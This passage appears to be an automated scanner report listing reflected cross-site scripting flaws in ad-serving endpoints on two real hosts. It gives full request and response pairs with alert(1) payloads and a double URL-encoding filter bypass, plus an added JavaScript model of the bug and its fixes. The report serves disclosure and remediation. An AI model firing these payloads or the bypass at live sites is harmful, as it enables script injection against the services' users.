User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2338

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a4dd2"-alert(1)-"7f1a0a0fe72=1">
...[SNIP]...

2.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc74e"><script>alert(1)</script>405f7dc3d84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&dc74e"><script>alert(1)</script>405f7dc3d84=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2368

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&dc74e"><script>alert(1)</script>405f7dc3d84=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ce6'-alert(1)-'7a6a2b33397 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**;10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*86ce6'-alert(1)-'7a6a2b33397 HTTP/1.1
Accept: */*
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/
Set-Cookie: i_1=46:475:844:44:0:32947:1290209601:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 730

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*86ce6'-alert(1)-'7a6a2b33397http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.844.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more
...[SNIP]...

2.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0 was submitted in the REST URL parameter 2. This input was echoed as 8332a"><script>alert(1)</script>8cdd98fbef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, submitting %253c, which the web server decodes to %3c and the application then decodes a second time to <.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313578332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0/475.0.iframe.200x33/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313578332a"><script>alert(1)</script>8cdd98fbef0/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26807%2522%253balert%25281%2529%252f%252fce3e2d56175 was submitted in the REST URL parameter 2. This input was echoed as 26807";alert(1)//ce3e2d56175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, submitting %253c, which the web server decodes to %3c and the application then decodes a second time to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135726807%2522%253balert%25281%2529%252f%252fce3e2d56175/475.0.iframe.200x33/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135726807";alert(1)//ce3e2d56175/475.0.iframe.200x33/1290209586**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c was submitted in the REST URL parameter 3. This input was echoed as 3fd2f"><script>alert(1)</script>83dff2bd15c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, submitting %253c, which the web server decodes to %3c and the application then decodes a second time to <.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e83dff2bd15c/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x333fd2f"><script>alert(1)</script>83dff2bd15c/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6313f%2522%253balert%25281%2529%252f%252f64bea35dc56 was submitted in the REST URL parameter 3. This input was echoed as 6313f";alert(1)//64bea35dc56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, submitting %253c, which the web server decodes to %3c and the application then decodes a second time to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f%2522%253balert%25281%2529%252f%252f64bea35dc56/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x336313f";alert(1)//64bea35dc56/1290209589**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...
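
Findings 2.56 to 2.59 all rest on the same filter-ordering bug: a blocklist check runs on the once-decoded path, and only afterwards does the application decode a second time. The following is an added example that models that bug and the report's two remediation options; it is not the ad.wsod.com code, and the check (`looksLikeXss`), the decode steps and the handler names are assumed stand-ins for whatever the real application does. Only `PAYLOAD` is taken from the report (the request line of finding 2.56).

```javascript
// Added example: a model of the filter-ordering bug behind the double
// URL-encoding bypass in findings 2.56 to 2.59. Nothing here is the real
// ad.wsod.com code; the check, the decode steps and the handler names are
// assumed stand-ins. Only PAYLOAD is taken from the report (finding 2.56).

// A blocklist check of the kind the report describes: reject the obvious HTML
// metacharacters. (Assumed; the real application's check is not visible.)
function looksLikeXss(s) {
  return /[<>"']/.test(s);
}

// The web server percent-decodes the request path once before the application
// sees it; we model that step explicitly. decodeURIComponent throws a URIError
// on malformed sequences, which is acceptable for this model.
function serverDecode(rawPath) {
  return decodeURIComponent(rawPath);
}

// VULNERABLE: validate the once-decoded value, then decode it a second time and
// use the result. %253c reaches the check as %3c, passes, and only then turns
// into '<'.
function vulnerableHandler(rawPath) {
  const once = serverDecode(rawPath);
  if (looksLikeXss(once)) return { blocked: true, value: null };
  const twice = decodeURIComponent(once); // the needless second decode
  return { blocked: false, value: twice };
}

// FIX 1 (the report's first point): do not decode a second time at all. The
// value stays percent-encoded and contains no metacharacters.
function fixedHandlerNoDoubleDecode(rawPath) {
  const once = serverDecode(rawPath);
  if (looksLikeXss(once)) return { blocked: true, value: null };
  return { blocked: false, value: once };
}

// FIX 2 (the report's second point): if a second decode really is required,
// canonicalise first and validate the canonical form, never an intermediate one.
function fixedHandlerValidateAfterCanon(rawPath) {
  const canonical = decodeURIComponent(serverDecode(rawPath));
  if (looksLikeXss(canonical)) return { blocked: true, value: null };
  return { blocked: false, value: canonical };
}

// Payload from finding 2.56 exactly as it appears in the request line.
const PAYLOAD =
  '8332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0';

// The same payload encoded only once (constructed): every variant catches it.
const SINGLE_ENCODED =
  '8332a%22%3e%3cscript%3ealert%281%29%3c%2fscript%3e8cdd98fbef0';

// Runs all three handlers over both inputs so the outcomes can be compared.
function demo() {
  return {
    vulnerable: vulnerableHandler(PAYLOAD),
    vulnerableSingleEncoded: vulnerableHandler(SINGLE_ENCODED),
    noDoubleDecode: fixedHandlerNoDoubleDecode(PAYLOAD),
    validateAfterCanon: fixedHandlerValidateAfterCanon(PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the vulnerable handler letting the double-encoded payload through and producing exactly the string the report says was echoed, while the single-encoded form is blocked by every variant. Fix 1 is the better of the two: a value that is never decoded a second time cannot acquire metacharacters after the check, whatever the blocklist misses.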

2.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a88b6'-alert(1)-'00389b2718a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**;10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a88b6'-alert(1)-'00389b2718a=1 HTTP/1.1
Accept: */*
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:35:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/
Set-Cookie: i_1=46:475:692:44:0:32947:1290209716:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 734

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a88b6'-alert(1)-'00389b2718a=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.692.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out mo
...[SNIP]...

2.61. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9071"-alert(1)-"47372ef7d14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=316&anprice=30&ad_type=ad&ad_size=300x250&section=1532283&c9071"-alert(1)-"47372ef7d14=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.yieldmanager.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: BX=fqi84nl6de3q3&b=4&s=9s&t=322; uid=uid=689ad102-f426-11df-b990-003048d7035a&_hmacv=1&_salt=1708372009&_keyid=k1&_hmac=49fc8d8d0d2a456164de1e4f68d5504628b44692; ih="b!!!!Q!'LK4!!!!#<b,bH!(45o!!!!#<b*d`!(4r^!!!!$<b*A]!(4wv!!!!$<b)H$!)B[>!!!!$<b)J1!,-Jd!!!!$<apWx!,-g`!!!!#<b)L:!,/dG!!!!#<b)3o!,5Ea!!!!'<apF)!,@lO!!!!#<aoke!,@lR!!!!#<aokl!,_%Y!!!!#<b)=G!,g_7!!!!$<b+6'!,m=A!!!!#<b*d^!-Go'!!!!$<b+[0!-O+V!!!!#<b*Vq!-gH!!!!!#<b)6%!-m8S!!!!$<b+L<!-s%T!!!!$<b*qG!-tN8!!!!#<b*?O!-v-.!!!!#<apWb!.$Cj!!!!#<b)ff!.$Cl!!!!#<b*fg!.(nY!!!!$<b)fg!.,Il!!!!#<b*fg!.0E^!!!!#<apPx!.=Rq!!!!#<b+/[!.I]0!!!!%<b*J0!.Nam!!!!#<apWy!.T*s!!!!#<apWi!.T3-!!!!#<b):<!.W)`!!!!'<apNl!.W1W!!!!$<b)+D!.XPH!!!!#<b*Cf!.Xc.!!!!#<apG4!._aZ!!!!#<ay>R!.`:h!!!!$<b+H#!.`<0!!!!#<b*Y$!.aP%!!!!#<b*-O!.dFU!!!!#<b*yp!.k$1!!!!$<b+`D!.rxQ!!!!#<apU9!/$oc!!!!#<aokk!/%8c!!!!#<apF/!/'PK!!!!$<b+)<"; pv1="b!!!!Y!#8>=!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>>!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>?!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>A!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>B!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>C!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>F!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>G!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>H!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>J!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>L!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>M!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>O!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>P!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>Q!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!#^3*!%b`:~~~~~<b*Vq~~!#8>R!-I0R!$Khv!-O+V!$hh'!%lRJ!?5%!#<DN(!wVd.!%l4g!
